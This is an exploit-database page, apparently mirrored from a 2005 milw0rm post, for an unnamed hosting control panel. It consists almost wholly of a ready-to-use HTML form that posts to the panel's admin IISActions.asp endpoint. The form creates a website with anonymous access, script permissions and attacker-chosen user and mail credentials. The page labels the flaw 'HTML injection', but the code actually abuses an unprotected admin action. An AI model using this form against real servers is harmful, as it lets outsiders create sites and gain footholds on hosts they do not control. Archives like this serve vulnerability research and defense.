header-logo
Suggest Exploit
vendor:
by:
5.5
CVSS
MEDIUM
HTML Injection
79
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

HTML Form

This HTML form allows an attacker to inject malicious code into the website's admin page. The attacker can modify the website name, website type, IP address, and mail access settings.

Mitigation:

Sanitize user input and validate form fields to prevent HTML injection attacks.
Source

Exploit-DB raw data:

<!-- Change [url] /str0ke -->

<form method="post" name="addform" action="http://[url]/admin/iis/IISActions.asp?ActionType=AddSite&hostcustid=1&hostingplans=1">
<table>
<tr class="looplistingDark">
<td width="19%" class="Contents">Website Name : </td>
<td width="73%" class="contents">
<input type="text" size="25" name="fServerComment">
</td></tr><td>
ThirdLevelDomainCheck: </td><td><input type="TEXT" name="ThirdLevelDomainCheck" value="FALSE"></td>
</tr>WebUsers: <input type="TEXT" name="WebUsers" ID="WebUsers" value="YourUsername"><br>
hostcustid: <input type="TEXT" name="hostcustid" ID="hostcustid" value="1"><tr>
<td height="0" colspan="2">
<table width="100%" cellspacing="0" cellpadding="0">
<tr class="LoopListingdark">
<td width="19%" class="contents"> Website Type : </td>
<td width="73%" class="contents"><select name="IPLessCheckBox" id="IPLessCheckBox"><option value="NO">IP Based Domain</option><option value="YES">
       Name Based Domain
      </option></select></td>
</tr>
</table>
<div id="DivIPBased" style="font:10px bold;Visibility:Visible">
<table width="100%" ID="Table1" cellspacing="1" cellpadding="0" border="0" height="100%">IPAddress : <input type="TEXT" name="fIPAddress" value="127.0.0.1" ID="TEXT1">PortNo :<input type="TEXT" size="30" name="fPortNo" value="80" ID="TEXT2">IPLessDomain: <input type="TEXT" name="fIPLessDomain" value="FALSE" ID="TEXT3"></table></div>
</td>
</tr>
<tr>
<td colspan="2" align="left">
<table width="100%" cellspacing="0" cellpadding="0">
<tr class="looplistingDark">
<td width="19%" class="contents"> Mail Access : </td>
<td width="73%" class="contents"><input type="checkbox" name="mailaccess" value="YES" ID="mailaccess" checked> Enable
   </td>
</tr>
</table>
<div id="DivMailAccess" style="font:10px bold;Visibility:Visible">
<table class="bg2" width="100%" border="0" cellspacing="1">
<tr class="looplistingDark">
<td width="19%" class="contents">  Mail Server : </td>
<td width="73%" class="contents"><select id="Select3" name="MailServerType"><option>IMail Server</option>
<option>Merak Mail Server</option>
<option>MailEnable Server</option></select></td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents"> Mail Password : </td>
<td width="73%" class="contents"><input type="password" id="mailpassword" name="mailpassword"></td>
</tr>
</table>
</div>
</td>
</tr><tr><td>SiteType: </td><td><input type="TEXT" name="SiteType" value="www" ID="TEXT4"><tr class="looplistingDark">
<td width="19%" class="contents" colspan="2"> </td>
</tr>
<tr>
<td colspan="2" align="left">
<div id="DivAdvSettings" style="font:10px bold;Visibility:Visible">
<table width="100%" border="0" ID="Table3" cellspacing="1" cellpadding="1">
<tr class="looplistingDark">
<td width="19%" class="contents"> Allow Anonymous : </td>
<td width="73%" class="contents"><input type="radio" name="AllowAnon" value="NO" ID="Radio1">No
        <input type="radio" name="AllowAnon" value="YES" ID="Radio2" checked>Yes
       </td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents"> Access Permissions : </td>
<td width="73%" class="contents"><input type="checkbox" name="Read" value="YES" ID="Checkbox1" checked>Read
        <input type="checkbox" name="Write" value="YES" ID="Checkbox2">Write
        <input type="checkbox" name="Script" value="YES" ID="Checkbox3" checked>Script
       </td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents"> </td>
<td width="73%" class="contents"><input type="checkbox" name="Execute" value="YES" ID="Checkbox4">Execute (Includes Script)
       </td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents"> </td>
<td width="73%" class="contents"><input type="checkbox" name="DirBrowsing" value="YES" ID="Checkbox5">Directory Browsing Allowed
       </td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents"> </td>
<td width="73%" class="contents"><input type="checkbox" name="FrontPageWeb" value="YES" ID="Checkbox6"> Install FrontPage Extensions
       </td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents">Enable Default Document : </td>
<td width="73%" class="contents"><input type="Checkbox" name="enabledefaultdoc" value="YES" ID="Checkbox7" checked></td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents"> </td>
<td width="73%" class="contents"><input type="Text" name="defaultdoc" value="Default.htm,default.asp,index.htm,index.html,index.cfm,index.asp,default.aspx,index.aspx" size="60" ID="Text1"></td>
</tr>
</table>
</div>
</td>
</tr>
<tr class="btnbg">
<td width="73%" align="right" class="btnbg" colspan="2">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td><input type="submit" class="butn" name="Add Site2" value="  Next  >>  "> </td>
</tr>
</table>
</td>
</tr>
</table>
</form>

# milw0rm.com [2005-07-18]

Navigation

Suggest Exploit

Services By CQR